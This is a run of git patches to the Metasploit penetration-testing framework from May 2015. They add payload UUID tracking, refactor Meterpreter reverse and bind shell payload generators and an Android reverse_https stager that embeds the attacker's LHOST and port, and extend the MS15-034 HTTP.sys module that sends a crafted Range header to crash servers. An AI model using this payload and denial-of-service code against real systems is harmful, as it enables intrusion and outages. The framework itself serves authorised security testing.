diff --git a/lib/rex/json_hash_file.rb b/lib/rex/json_hash_file.rb
new file mode 100644
index 0000000000..196c5aadbb
--- /dev/null
+++ b/lib/rex/json_hash_file.rb
@@ -0,0 +1,94 @@
+# -*- coding => binary -*-
+
+require 'json'
+
+#
+# This class provides a thread-friendly hash file store in JSON format
+#
+module Rex
+class JSONHashFile
+
+  attr_accessor :path
+
+  def initialize(path)
+    self.path = path
+    @lock = Mutex.new
+    @hash = {}
+    @last = 0
+    synced_update
+  end
+
+  def [](k)
+    synced_update
+    @hash[k]
+  end
+
+  def []=(k,v)
+    synced_update do
+      @hash[k] = v
+    end
+  end
+
+  def keys
+    synced_update
+    @hash.keys
+  end
+
+  def delete(k)
+    synced_update do
+      @hash.delete(k)
+    end
+  end
+
+  def clear
+    synced_update do
+      @hash.clear
+    end
+  end
+
+private
+
+  # Save the file, but prevent thread & process contention
+  def synced_update(&block)
+    @lock.synchronize do
+      ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
+        fd.flock(::File::LOCK_EX)
+
+        # Reload and merge if the file has changed recently
+        if fd.stat.mtime.to_f > @last
+          parse_data(fd.read).merge(@hash).each_pair do |k,v|
+            @hash[k] = v
+          end
+        end
+
+        res = nil
+
+        # Update the file on disk if new data is written
+        if block_given?
+          res = block.call
+          fd.rewind
+          fd.write(JSON.pretty_generate(@hash))
+          fd.sync
+          fd.truncate(fd.pos)
+        end
+
+        @last = fd.stat.mtime.to_f
+
+        res
+      end
+    end
+  end
+
+
+  def parse_data(data)
+    return {} if data.to_s.strip.length == 0
+    begin
+      JSON.parse(data)
+    rescue JSON::ParserError => e
+      # elog("JSONHashFile @ #{path} was corrupt: #{e.class} #{e}"
+      {}
+    end
+  end
+
+end
+end

From 818d8b186c4b132f6e4ae4d3ab02620cfa0aab1a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 20 May 2015 01:10:19 -0500
Subject: [PATCH 0134/1013] Implement tracking

---
 lib/msf/core/payload/uuid/options.rb | 33 ++++++++++++++++++++++++++--
 1 file changed, 31 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/payload/uuid/options.rb b/lib/msf/core/payload/uuid/options.rb
index 083a3a655b..c5d23cf2cf 100644
--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -17,6 +17,8 @@ module Msf::Payload::UUID::Options
       [
         Msf::OptString.new('PayloadUUIDSeed', [ false, 'A string to use when generating the payload UUID (deterministic)']),
         Msf::OptString.new('PayloadUUIDRaw', [ false, 'A hex string representing the raw 8-byte PUID value for the UUID']),
+        Msf::OptString.new('PayloadUUIDName', [ false, 'A human-friendly name to reference this unique payload (requires tracking)']),
+        Msf::OptBool.new('PayloadUUIDTracking', [ true, 'Whether or not to automatically register generated UUIDs', true]),
       ], self.class)
   end
 
@@ -31,7 +33,7 @@ module Msf::Payload::UUID::Options
   def generate_uri_uuid_mode(mode,len=nil)
     sum = uri_checksum_lookup(mode)
 
-    # The URI length may not have room for an embedded checksum
+    # The URI length may not have room for an embedded UUID
     if len && len < URI_CHECKSUM_UUID_MIN_LEN
       # Throw an error if the user set a seed, but there is no room for it
       if datastore['PayloadUUIDSeed'].to_s.length > 0 ||datastore['PayloadUUIDRaw'].to_s.length > 0
@@ -66,7 +68,34 @@ module Msf::Payload::UUID::Options
       conf[:puid] = puid_raw
     end
 
-    Msf::Payload::UUID.new(conf)
+    # Generate the UUID object
+    uuid = Msf::Payload::UUID.new(conf)
+    record_payload_uuid(uuid)
+
+    uuid
+  end
+
+  # Store a UUID in the JSON database if tracking is enabled
+  def record_payload_uuid(uuid, info={})
+    return unless datastore['PayloadUUIDTracking']
+
+    uuid_info = info.merge({
+      arch: uuid.arch,
+      platform: uuid.platform,
+      timestamp: uuid.timestamp,
+      payload: self.fullname,
+      datastore: self.datastore
+    })
+
+    if datastore['PayloadUUIDSeed'].to_s.length > 0
+      uuid_info[:seed] = datastore['PayloadUUIDSeed']
+    end
+
+    if datastore['PayloadUUIDName'].to_s.length > 0
+      uuid_info[:name] = datastore['PayloadUUIDName']
+    end
+
+    framework.uuid_db[uuid.puid_hex] = uuid_info
   end
 
 end

From d0a5b803e8fbd2f17443861a1a8a5181926b6436 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 20 May 2015 16:25:52 +1000
Subject: [PATCH 0135/1013] Use generate_payload_uuid instead of manual obj
 creation

---
 lib/msf/core/payload/linux/send_uuid.rb               |  8 +-------
 lib/msf/core/payload/php/send_uuid.rb                 |  6 +-----
 lib/msf/core/payload/python/send_uuid.rb              |  6 +-----
 lib/msf/core/payload/windows/send_uuid.rb             |  8 +-------
 lib/msf/core/payload/windows/x64/send_uuid.rb         |  8 +-------
 .../payloads/singles/php/meterpreter_reverse_tcp.rb   |  6 +-----
 .../payloads/singles/windows/meterpreter_bind_tcp.rb  |  7 +------
 .../singles/windows/meterpreter_reverse_http.rb       |  7 +------
 .../singles/windows/meterpreter_reverse_https.rb      |  7 +------
 .../singles/windows/meterpreter_reverse_ipv6_tcp.rb   |  7 +------
 .../singles/windows/meterpreter_reverse_tcp.rb        |  7 +------
 .../singles/windows/x64/meterpreter_bind_tcp.rb       |  7 +------
 .../singles/windows/x64/meterpreter_reverse_http.rb   |  7 +------
 .../singles/windows/x64/meterpreter_reverse_https.rb  |  7 +------
 .../windows/x64/meterpreter_reverse_ipv6_tcp.rb       |  7 +------
 .../singles/windows/x64/meterpreter_reverse_tcp.rb    |  7 +------
 modules/payloads/stages/linux/x86/meterpreter.rb      | 11 ++---------
 modules/payloads/stages/php/meterpreter.rb            |  6 +-----
 modules/payloads/stages/python/meterpreter.rb         |  6 +-----
 modules/payloads/stages/windows/meterpreter.rb        |  7 +------
 modules/payloads/stages/windows/x64/meterpreter.rb    |  7 +------
 21 files changed, 22 insertions(+), 127 deletions(-)

diff --git a/lib/msf/core/payload/linux/send_uuid.rb b/lib/msf/core/payload/linux/send_uuid.rb
index fb917448f2..977b70b453 100644
--- a/lib/msf/core/payload/linux/send_uuid.rb
+++ b/lib/msf/core/payload/linux/send_uuid.rb
@@ -19,13 +19,7 @@ module Payload::Linux::SendUUID
   # This code assumes that the communications socket handle is in edi.
   #
   def asm_send_uuid(uuid=nil)
-    unless uuid
-      uuid = Msf::Payload::UUID.new(
-        platform: 'linux',
-        arch:     ARCH_X86
-      )
-    end
-
+    uuid ||= generate_payload_uuid
     uuid_raw = uuid.to_raw
 
     asm =%Q^
diff --git a/lib/msf/core/payload/php/send_uuid.rb b/lib/msf/core/payload/php/send_uuid.rb
index c4ffae412e..25a29c5477 100644
--- a/lib/msf/core/payload/php/send_uuid.rb
+++ b/lib/msf/core/payload/php/send_uuid.rb
@@ -21,11 +21,7 @@ module Payload::Php::SendUUID
     sock_var = opts[:sock_var] || '$s'
     sock_type = opts[:sock_type] || '$s_type'
 
-    uuid = opts[:uuid] || Msf::Payload::UUID.new(
-      platform: 'php',
-      arch:     ARCH_PHP
-    )
-
+    uuid = opts[:uuid] || generate_payload_uuid
     uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
 
     php = %Q^$u="#{uuid_raw}";
diff --git a/lib/msf/core/payload/python/send_uuid.rb b/lib/msf/core/payload/python/send_uuid.rb
index cd61745084..2e48b7dbf0 100644
--- a/lib/msf/core/payload/python/send_uuid.rb
+++ b/lib/msf/core/payload/python/send_uuid.rb
@@ -20,11 +20,7 @@ module Payload::Python::SendUUID
   def py_send_uuid(opts={})
     sock_var = opts[:sock_var] || 's'
 
-    uuid = opts[:uuid] || Msf::Payload::UUID.new(
-      platform: 'python',
-      arch:     ARCH_PYTHON
-    )
-
+    uuid = opts[:uuid] || generate_payload_uuid
     uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
 
     "#{sock_var}.send(\"#{uuid_raw}\")\n"
diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb
index 5535ebfee5..556bd49335 100644
--- a/lib/msf/core/payload/windows/send_uuid.rb
+++ b/lib/msf/core/payload/windows/send_uuid.rb
@@ -20,13 +20,7 @@ module Payload::Windows::SendUUID
   # the communications socket handle is in edi.
   #
   def asm_send_uuid(uuid=nil)
-    unless uuid
-      uuid = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
-
+    uuid ||= generate_payload_uuid
     uuid_raw = uuid.to_raw
 
     asm =%Q^
diff --git a/lib/msf/core/payload/windows/x64/send_uuid.rb b/lib/msf/core/payload/windows/x64/send_uuid.rb
index 9f0de57262..b953425090 100644
--- a/lib/msf/core/payload/windows/x64/send_uuid.rb
+++ b/lib/msf/core/payload/windows/x64/send_uuid.rb
@@ -20,13 +20,7 @@ module Payload::Windows::SendUUID_x64
   # the communications socket handle is in rdi.
   #
   def asm_send_uuid(uuid=nil)
-    unless uuid
-      uuid = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86_64
-      )
-    end
-
+    uuid ||= generate_payload_uuid
     uuid_raw = uuid.to_raw
 
     asm =%Q^
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index 611eab064e..1b61fbe37b 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -37,11 +37,7 @@ module Metasploit4
     met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
     met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']
 
-    uuid = Msf::Payload::UUID.new(
-      platform: 'php',
-      arch:     ARCH_PHP
-    )
-
+    uuid = generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
 
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 3cf4270eea..714b403634 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index d896a4dae2..78561d56b4 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 241bb19f9b..195a176b98 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index efab821ffc..6e2e54fe32 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -45,12 +45,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 7e1b2a0789..92121049a0 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -44,12 +44,7 @@ module Metasploit3
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 6fa749697b..2ce61320a7 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 8fbb63b9a0..7dec0bec7b 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 65bdd0ad74..78d31e916a 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index 22650c4a37..c819611c57 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -45,12 +45,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 55a7acbceb..3f534da845 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -44,12 +44,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block
     config_opts = {
diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb
index 8056077829..6b1a2c0e67 100644
--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@@ -149,18 +149,11 @@ module Metasploit3
   end
 
   def generate_meterpreter
-    blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
-
-    blob
+    MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new({
-        :platform => 'linux',
-        :arch     => ARCH_X86
-      })
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index 5d6be8ce08..860625da8a 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -31,11 +31,7 @@ module Metasploit4
       f.read(f.stat.size)
     }
 
-    uuid = opts[:uuid] || Msf::Payload::UUID.new(
-      platform: 'php',
-      arch:     ARCH_PHP
-    )
-
+    uuid = opts[:uuid] || generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
 
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index c00b559c35..597eb7233e 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -37,11 +37,7 @@ module Metasploit3
       met = met.sub("DEBUGGING = False", "DEBUGGING = True")
     end
 
-    uuid = opts[:uuid] || Msf::Payload::UUID.new(
-      platform: 'python',
-      arch:     ARCH_PYTHON
-    )
-
+    uuid = opts[:uuid] || generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("PAYLOAD_UUID = \"\"", "PAYLOAD_UUID = \"#{bytes}\"")
 
diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb
index 61c9dea629..2363cb9a45 100644
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
@@ -37,12 +37,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X86
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb
index d72041d837..690d4aac11 100644
--- a/modules/payloads/stages/windows/x64/meterpreter.rb
+++ b/modules/payloads/stages/windows/x64/meterpreter.rb
@@ -37,12 +37,7 @@ module Metasploit4
   end
 
   def generate_config(opts={})
-    unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new(
-        platform: 'windows',
-        arch:     ARCH_X64
-      )
-    end
+    opts[:uuid] ||= generate_payload_uuid
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {

From 96a30118e25c7804c8159d980e16327f2dd4937c Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Wed, 20 May 2015 07:25:37 +0100
Subject: [PATCH 0136/1013] add https cert validation

---
 .../payloads/stagers/android/reverse_https.rb | 27 ++++++++++++++-----
 1 file changed, 20 insertions(+), 7 deletions(-)

diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
index 7b353a693d..f1517bb1c1 100644
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -27,23 +27,36 @@ module Metasploit3
   end
 
   def generate_jar(opts={})
-    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
-    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + rand(256-30)
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
 
-    jar = Rex::Zip::Jar.new
+    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
+    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    lurl << "/"
+    lurl << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+
+    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                         datastore['HandlerSSLCert'])
+    if verify_cert_hash
+        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
+        string_sub(classes, 'WWWW                                        ', hash)
+    end
+
     apply_options(classes)
 
+    jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 

From 5963a5833a78d8374df676cd047d3855d1fd8170 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 20 May 2015 16:50:00 +1000
Subject: [PATCH 0137/1013] Fix up php stageless payload includes

---
 lib/msf/core/payload/php/reverse_tcp.rb                 | 2 ++
 modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
index 77baa0688c..e3db9eff11 100644
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -3,6 +3,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/php/send_uuid'
+require 'msf/core/payload/uuid_options'
 
 module Msf
 
@@ -15,6 +16,7 @@ module Msf
 module Payload::Php::ReverseTcp
 
   include Msf::Payload::Php::SendUUID
+  include Msf::Payload::UUIDOptions
 
   #
   # Generate the first stage
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index 1b61fbe37b..ba8464c4ed 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/php/reverse_tcp'
 require 'msf/base/sessions/meterpreter_php'
 require 'msf/base/sessions/meterpreter_options'
 
@@ -14,6 +15,7 @@ module Metasploit4
   CachedSize = 25532
 
   include Msf::Payload::Single
+  include Msf::Payload::Php::ReverseTcp
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})

From 202a77fc129c72465d87b09d99a93840fa899bb6 Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Wed, 20 May 2015 18:08:00 +0100
Subject: [PATCH 0138/1013] Improves detection of the MS15-034

---
 .../dos/http/ms15_034_ulonglongadd.rb         | 87 ++++++++++++++-----
 1 file changed, 65 insertions(+), 22 deletions(-)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 0eb68da758..9c0965579f 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'A valid file resource', '/welcome.png'])
+        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])
       ], self.class)
 
     deregister_options('RHOST')
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
     @file_size ||= lambda {
       file_size = -1
       uri = normalize_uri(target_uri.path)
-      res = send_request_raw({'uri'=>uri})
+      res = send_request_raw('uri' => uri)
 
       unless res
         vprint_error("#{ip}:#{rport} - Connection timed out")
@@ -87,7 +87,6 @@ class Metasploit3 < Msf::Auxiliary
     }.call
   end
 
-
   def dos_host(ip)
     file_size = get_file_size(ip)
     lower_range = file_size - 2
@@ -97,13 +96,13 @@ class Metasploit3 < Msf::Auxiliary
     begin
       cli = Rex::Proto::Http::Client.new(ip)
       cli.connect
-      req = cli.request_raw({
+      req = cli.request_raw(
         'uri' => uri,
         'method' => 'GET',
         'headers' => {
           'Range' => "bytes=#{lower_range}-#{upper_range}"
         }
-      })
+      )
       cli.send_request(req)
     rescue ::Errno::EPIPE, ::Timeout::Error
       # Same exceptions the HttpClient mixin catches
@@ -111,25 +110,69 @@ class Metasploit3 < Msf::Auxiliary
     print_status("#{ip}:#{rport} - DOS request sent")
   end
 
-
-  def check_host(ip)
-    return Exploit::CheckCode::Unknown if get_file_size(ip) == -1
-
+  def potential_static_files_uris
     uri = normalize_uri(target_uri.path)
-    res = send_request_raw({
-      'uri' => uri,
-      'method' => 'GET',
-      'headers' => {
-        'Range' => "bytes=0-#{upper_range}"
-      }
-    })
-    if res && res.body.include?('Requested Range Not Satisfiable')
-      return Exploit::CheckCode::Vulnerable
-    elsif res && res.body.include?('The request has an invalid header name')
-      return Exploit::CheckCode::Safe
-    else
-      return Exploit::CheckCode::Unknown
+
+    return [uri] unless uri[-1, 1] == '/'
+
+    uris = ["#{uri}welcome.png"]
+    res  = send_request_raw('uri' => uri, 'method' => 'GET')
+
+    return uris unless res
+
+    site_uri = URI.parse(full_uri)
+
+    Nokogiri::HTML(res.body).xpath('//link|//script|//style|//img').each do |tag|
+      %w(href src).each do |attribute|
+        begin
+          attr_value = tag[attribute]
+
+          next unless attr_value && !attr_value.empty?
+
+          uri = site_uri.merge(URI.encode(attr_value.strip))
+
+          next unless uri.host == vhost || uri.host == rhost
+
+          uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
+        rescue => e
+          vprint_error("#{peer} - #{e}")
+          next
+        end
+      end
     end
+
+    uris.uniq
   end
 
+  def check_host(ip)
+    potential_static_files_uris.each do |potential_uri|
+      uri = normalize_uri(potential_uri)
+
+      res = send_request_raw(
+        'uri' => uri,
+        'method' => 'GET',
+        'headers' => {
+          'Range' => "bytes=0-#{upper_range}"
+        }
+      )
+
+      vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
+
+      if res && res.body.include?('Requested Range Not Satisfiable')
+        print_status("#{vmessage} - Vulnerable")
+
+        target_uri.path = uri # Needed for the DoS attack
+
+        return Exploit::CheckCode::Vulnerable
+      elsif res && res.body.include?('The request has an invalid header name')
+        vprint_status("#{vmessage} - Safe")
+
+        return Exploit::CheckCode::Safe
+      else
+        vprint_status("#{vmessage} - Unknown")
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
 end

From 4f6fe2abce1b6ca7413f8b064079a2db797ce512 Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Wed, 20 May 2015 21:36:03 +0100
Subject: [PATCH 0139/1013] Avoids swallowing exceptions

---
 .../dos/http/ms15_034_ulonglongadd.rb          | 18 +++++++-----------
 1 file changed, 7 insertions(+), 11 deletions(-)

diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 9c0965579f..011e85351f 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -121,23 +121,19 @@ class Metasploit3 < Msf::Auxiliary
     return uris unless res
 
     site_uri = URI.parse(full_uri)
+    page     = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))
 
-    Nokogiri::HTML(res.body).xpath('//link|//script|//style|//img').each do |tag|
+    page.xpath('//link|//script|//style|//img').each do |tag|
       %w(href src).each do |attribute|
-        begin
-          attr_value = tag[attribute]
+        attr_value = tag[attribute]
 
-          next unless attr_value && !attr_value.empty?
+        next unless attr_value && !attr_value.empty?
 
-          uri = site_uri.merge(URI.encode(attr_value.strip))
+        uri = site_uri.merge(URI.encode(attr_value.strip))
 
-          next unless uri.host == vhost || uri.host == rhost
+        next unless uri.host == vhost || uri.host == rhost
 
-          uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
-        rescue => e
-          vprint_error("#{peer} - #{e}")
-          next
-        end
+        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
       end
     end
 

From ac0004ea0abb03cf598c91e39f1940ff87919d86 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 20 May 2015 19:47:17 -0500
Subject: [PATCH 0140/1013] Implement IgnoreUnknownPayloads

---
